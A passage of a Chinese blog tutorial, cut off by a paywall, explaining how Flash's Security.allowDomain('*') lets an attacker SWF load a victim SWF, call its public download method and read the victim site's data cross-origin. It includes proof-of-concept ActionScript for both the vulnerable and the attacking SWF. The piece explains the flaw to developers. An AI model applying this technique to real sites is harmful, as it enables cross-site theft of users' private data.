隐私泄露杀手锏 —— Flash 权限反射

最新推荐文章于 2023-08-09 08:56:04 发布
最新推荐文章于 2023-08-09 08:56:04 发布
阅读量469 收藏
点赞数
分类专栏: 安全开发 实战篇 文章标签: flash权限反射 经典
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kclax/article/details/92392761
版权

在这里插入图片描述

前言 一直以为该风险早已被重视,但最近无意中发现,仍有不少网站存在该缺陷,其中不乏一些常用的邮箱、社交网站,于是有必要再探讨一遍。

事实上,这本不是什么漏洞,是 Flash 与生俱来的一个正常功能。但由于一些 Web 开发人员了解不够深入,忽视了该特性,从而埋下安全隐患。

原理
这一切还得从经典的授权操作说起:

 Security.allowDomain('*')

对于这行代码,或许都不陌生。尽管知道使用 * 是有一定风险的,但想想自己的 Flash 里并没有什么高危操作,把我拿去又能怎样?

显然,这还停留在 XSS 的思维上。Flash 和 JS 通信确实存在 XSS 漏洞,但要找到一个能利用的 swf 文件并不容易:既要读取环境参数,又要回调给 JS,还得确保自动运行。

因此,一些开发人员以为只要不与 JS 通信,就高枕无忧了。同时为了图方便,直接给 swf 授权了 *,省去一大堆信任列表。

事实上,Flash 被网页嵌套仅仅是其中一种而已,更普遍的,则是 swf 之间的嵌套。然而无论何种方式,都是通过 Security.allowDomain 进行授权的 —— 这意味着,一个 * 不仅允许被第三方网页调用,同时还包括了其他任意 swf!

被网页嵌套,或许难以找到利用价值。但被自己的同类嵌套,可用之处就大幅增加了。因为它们都是 Flash,位于同一个运行时里,相互之间存在着密切的关联。

我们如何将这种关联,进行充分利用呢?

利用
关联容器

在 Flash 里,舞台(stage)是这个世界的根基。无论加载多少个 swf,舞台始终只有一个。任何元素(DisplayObject)必须添加到舞台、或其子容器下,才能展示和交互。
在这里插入图片描述
因此,不同 swf 创建的元素,都是通过同一个舞台展示的。它们能感知相互的存在,只是受到同源策略的限制,未必能相互操作。

然而,一旦某个 swf 主动开放权限,那么它的元素就不再受到保护,能被任意 swf 访问了!

听起来似乎不是很严重。我创建的界面元素,又有何访问价值?也就获取一些坐标、颜色等信息而已。

偷窥元素的自身属性,或许并没什么意义。但并非所有的元素,都是为了纯粹展示的 —— 有时为了扩展功能,继承了元素类的特征,在此之上实现额外的功能。

最典型的,就是每个 swf 的主类:它们都继承于 Sprite,即使程序里没用到任何界面相关的。

有这样扩展元素存在,我们就可以访问那些额外的功能了。

开始我们的第一个案例。某个 swf 的主类在 Sprite 的基础上,扩展了网络加载的功能:

// vul.swf
public class Vul extends Sprite {

    public var urlLoader:URLLoader = new URLLoader();
    
    public function download(url:String) : void {
        urlLoader.load(new URLRequest(url));
        ...
    }

    public function Vul() {
        Security.allowDomain('*');
        ...
    }
    ...
}

通过第三方 swf,我们将其加载进来。由于 Vul 继承了 Sprite,因此拥有了元素的基因,我们可以从容器中找到它。

同时它也是主类,默认会被添加到 Loader 这个加载容器里。

// exp.swf
var loader:Loader = new Loader();
loader.contentLoaderInfo.addEventListener('complete', function(e:Event) : void {
    var main:* = DisplayObjectContainer(loader).getChildAt(0);

    trace(main);    // [object Vul]
});
loader.load(new URLRequest('//swf-site/vul.swf'));

因为 Loader 是子 swf 的默认容器,所以其中第一个元素显然就是子 swf 的主类:Vul。

由于 Vul 定义了一个叫 download 的公开方法,并且授权了所有的域名,因此在第三方 exp.swf 里,自然也能调用它:
在这里插入图片描述

main.download('//swf-site/data');

同时 Vul 中的 urlLoader 也是一个公开暴露的成员变量,同样可被外部访问到,并对其添加数据接收事件:

var ld:URLLoader = main.urlLoader;
ld.addEventListener('complete', function(e:Event) : void {
    trace(ld.data);
});

尽管这个 download 方法是由第三方 exp.swf 发起的,但最终执行 URLLoader 的 load 方法时,上下文位于 vul.swf 里,因此这个请求仍属于 swf-site 的源。

于是攻击者从任意位置,跨站访问 swf-site 下的数据了。

更糟的是,Flash 的跨源请求可通过 crossdomain.xml 来授权。如果

最低0.47元/天 解锁文章
Coisini、
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Spring Boot面试杀手锏————自动配置原理
Morty的技术乐园
11-07 19万+
引言 不论在工作中,亦或是求职面试,Spring Boot已经成为我们必知必会的技能项。除了某些老旧的政府项目或金融项目持有观望态度外,如今的各行各业都在飞速的拥抱这个已经不是很新的Spring启动框架。 当然,作为Spring Boot的精髓,自动配置原理的工作过程往往只有在“面试”的时候才能用得上,但是如果在工作中你能够深入的理解Spring Boot的自动配置原理,将无往不利。 Spr...
Adobe Flash爆出严重漏洞:可导致代码任意执行 获取个人隐私
qq_41679358的博客
08-03 737
文章目录[隐藏] Adobe 被爆出的漏洞:受影响的产品版本升级修复版本其他漏洞受影响的产品版本升级修复版本 众所周知,Flash是网络攻击的首选目标。值得注意的是,Adobe在2017年7月宣布计划将Flash推入使用寿命终止状态,这意味着它将在今年年底不再更新或分发Flash Player。不过仍然在使用Adobe的用户需要警惕,因为Adobe 在今年5月被爆出了多个严重漏洞,好在Ado...
flash 反射机制基础知识
wangluozhangleilei的专栏
12-03 1414
flash.utils包中顶级函数   getDefinitionByName 完全限定类名的字符串 ----类名   getQualifiedClassName 对象------完全限定类名的字符串   getQualifiedSuperclassName 对象------  基类的完全限定类名的字符串
Flash AS3反射机制
andy000107的博客
09-05 133
1.为什么要用反射机制去生成对象? 这个问题如果你没一定的面向对象基础可能比较难理解以下内容。首先,其目的是为了解耦,解除代码间的耦合程度,降低维护成本。如果你用过工厂模式,或者对维护噩梦有所感悟就会知道为什么要解耦了。无论什么工厂模式,即使是抽象工厂模式也好,也不能根本性解除代码中生成对象的耦合问题,只能说能大大降低耦合程度,因为你生成对象必然要new此对象,而这意味着没可...
HTML播放FLASHSWF)神器-SWFObject
weixin_34383618的博客
02-23 256
  环境 必须有 swfobject.js和 expressInstall.swf js:  http://pan.baidu.com/share/link?shareid=2536087943&uk=4079065711&fid=1686543302 swf: http://pan.baidu.com/share/link?shareid=635618309&uk...
网站维护杀手锏——网络编程——ASP、PHP、JSP与数据库互联.pdf
最新发布
01-06
《网站维护杀手锏——网络编程——ASP、PHP、JSP与数据库互联》这本书主要探讨了在网络编程领域中,如何利用ASP、PHP、JSP这三种常见的服务器端脚本语言与数据库进行有效连接和交互,从而实现网站数据的动态管理与...
网站维护杀手锏——网络编程——设定ASP、PHP、JSP操作环境.pdf
01-06
总的来说,掌握ASP、PHP和JSP的操作环境设定是网站维护的重要杀手锏。理解这些技术的基本原理和配置流程,不仅能够帮助开发者快速搭建开发环境,还能在出现问题时迅速定位并解决,从而提升网站的稳定性和用户体验。...
酒店采购成本降低的杀手锏——线上配电盘模式借鉴.pdf
01-03
【配电盘模式】在商业领域的应用,特别是在酒店采购成本降低上的实践,是一种高效且具有创新性的商业模式。这种模式借鉴自电力行业的配电盘概念,旨在通过建立一个集中化的平台,连接供应商与消费者,降低交易成本,...
用JavaScript嵌入你的SWF
weixin_34379433的博客
05-11 187
用JavaScript嵌入你的SWF swfobject.embedSWF(swfUrl, id, width, height, version, expressInstallSwfurl, flashvars, params, attributes)有5个必须的参数和4个可选的参数: swfUrl(String,必须的)指定SWF的URL。 id(String,必须的)...
网页中嵌入swf文件的几种方法
思月行云
06-02 723
http://www.cnblogs.com/Carpe-Diem/articles/2310831.html  1. object + embed       传统的方法 优点:浏览器兼容性好,是 Macromedia 一直以来的官方方法缺点:a.embed 标签是不符合 W3C 的规范的,无法通过验证。当然,如果你不在乎什么规范不规范,另当别论。b.微软由于种种原因,在 sp2...
jsp 加载swf文件
码农一个
02-27 3383
flex生成swf文件以后需要被jsp页面调用调用的方式如下: --> 此页面上的内容需要较新版本的
addEventListener方法
m0_57263959的博客
08-09 1861
是一种强大的机制,可以用于在 JavaScript 中实现对 DOM 元素的事件响应,从而创建丰富的交互式用户界面。,您可以指定在特定事件发生时执行的函数,从而实现对用户交互或其他类型的事件的响应。函数会被调用,并在控制台输出 "Button clicked!示例:在 JavaScript 中使用。是 JavaScript 中用于向。DOM 元素添加事件监听器。将点击事件监听器绑定到。元素上,当按钮被点击时,
转载:页面加载swf插件:swfobject
weixin_33857230的博客
11-06 114
转自:http://www.cnblogs.com/analyzer/articles/1299592.html 我一直都在用SWFObject 插入flash,好处多多,代码简洁,不会出现微软的“单击此处以激活控件”的提示(据可靠消息,这个是微软惹的官司,其结果是害苦了用户)。不过先前的 调用方法着实有些繁琐,先实例化->添加参数、变量->写入,搞的跟把大象装冰箱里头一样麻烦。...
网页显示flash需“点击激活此控件……”的解决办法
04-19 2829
web前端工程经常要在网页中加入一些flash,达到一种梦幻般的感觉,但是在加入flash后,鼠标移到flash上面的时候会出现虚框,而且显示“单击以激活控件”,好别扭啊,这对于用户来说是极不友好的,下面就说说如何解决这个问题。 先说说如何在网页加入flash,代码如下: 不详细说明了,相信大家都明白,但是这样的方法会出现如题所说的问题,怎么解决呢,两种方法: 第一种方法
js与flash交互操作1
真爱无限的CSDN博客
08-01 4241
//flash里传送值 '' //flash里获取值 this.uploadURL=root.loaderinfo.parameters.uploadURL SWFUpload.prototype.getFlashVars = function () {    // Build a string from the post param object    var paramStri
打造手机应用杀手锏:成功十要素
9. **法律与隐私保护**:严格遵守法律法规,尊重用户隐私,建立信任关系,这对于长期的成功至关重要。 10. **财务可持续性**:确保商业模式的可持续性,平衡广告收入、内购、订阅等多种盈利方式,同时考虑成本控制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值